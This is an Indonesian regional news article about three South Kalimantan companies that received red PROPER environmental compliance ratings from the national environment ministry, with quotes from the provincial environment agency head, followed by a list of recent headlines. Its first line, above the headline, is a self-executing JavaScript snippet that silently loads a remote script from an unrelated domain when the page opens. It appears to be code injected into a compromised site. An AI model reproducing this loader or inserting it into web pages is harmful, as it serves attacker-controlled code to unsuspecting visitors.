(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Tiga Perusahaan di Kalsel Terima Rapor Merah dari KLHK, Ini Nama-namanya


KANALKALIMANTAN.COM, BANJARBARU – Dinas Lingkungan Hidup (DLH) Provinsi Kalimantan Selatan (Kalsel) mencatat masih ada 3 perusahaan yang mendapat Proper (Program Penilaian Peringkat Kinerja Perusahaan dalam Pengelolaan Lingkungan Hidup) dari Kementerian Lingkungan Hidup dan Kehutanan (KLHK) RI.

Dibanding tahun lalu, penerima Proper merah di Kalsel mengalami peningkatanan dalam menekan Proper merah. Tercatat penilaian Proper pada tahun 2021 Kalsel menerima 6 Proper merah. Sedangkan untuk tahun 2022 masih ada 3 perusahaan yang masih menerima Proper merah dari KLHK.

Ketiga perusahaan tersebut yakni PT Fumakilla Indonesia di Banjarbaru, PT Pancuran Kaapit Sendang di Banjarbaru, dan PT Pelabuhan Indonesia III (Persero) Banjarmasin.

Kepala DLH Kalsel Hanifah Dwi Nirwana mengatakan, peningkatan ini terjadi dikarenakan pihaknya dengan ketat melakukan pendampingan kepada 6 perusahaan yang mendapatkan Proper merah dari KLHK.

 

Baca juga: Food Estate di Dadahup Dulu Lahan Rawa Terlantar, Kini Bisa Ditanami dengan Baik

“Usai penyerahan Proper tahun kemarin, kita lakukan pembinaan secara berkelanjutan,” ujarnya, Senin (20/3/2023).

Diungkapkan Hanifah, untuk tiga perusahaan yang mendapatkan Proper merah, pihaknya akan melakukan pengetatan pembinaan kepada tiga perusahaan tersebut.

Hal ini merujuk pada indikator kerja DLH Kalsel yang mengharapkan tidak ada lagi perusahaan yang menerima Proper merah pada Propernas maupun Properda.

Dibeberkan Kadis LH Kalsel, beberapa kendala memang sering ditemui ketika melakukan penilaian Proper ini. Diantaranya terkait HRD yang kerap berganti pada perusahaan.

“Ini yang menjadi PR kami, DLH tetap melakukan pembinaan secara ketat pada 3 perusahaan yang mendapat Proper merah itu,” katanya.

Selain itu, DLH Kalsel juga akan gencar melakukan sosialisasi kepada perusahaan yang mendapat Proper merah tentang pemenuhaan kewajiban perusahaan kepada pengelolaan lingkungan hidup.

Baca juga: Puluhan Perusahaan di Kalsel Terima Proper Nasional dan Daerah

“Merah ini lebih kepada ketaan mereka (perusahaan) dalam pelaporan,” ungkapnya.

Hanifah berharap, perusahaan yang masih progres perbaikan dapat segera menaati komponen yang ada di Proper. Sebab pada penilaian tahun ini, ditargetkan tidak ada perusahaan yang mendapatkan rapor merah.

Perusahaan yang telah mendapatkan penilaian biru, ditargetkan memperoleh rapor hijau, bahkan dianjurkan bisa meraih rapor emas.

“Target kita tahun ini tidak ada lagi yang dapat rapor merah, yang biru bisa menjadi hijau. Syukur-syukur bisa emas seperti PT Adaro tahun kemarin,” bebernya.

Ada beberapa kriteria yang dilakukan dalam penilaian proper lingkungan oleh KLHK. Mulai dari pengendalian pencemaran air, pemeliharaan sumber air, pengendalian pencemaran udara, pengelolaan limbah B3 dan non B3, sampai pengendalian kerusakan lahan.

“Kemudian pemberdayaan masyarakatnya dan hal-hal lebih lainnyat yang dilakukan perusahaan,” tandasnya. (Kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : bie


Risa

Recent Posts

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

21 menit ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

41 menit ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

1 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

2 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

4 jam ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

5 jam ago

This website uses cookies.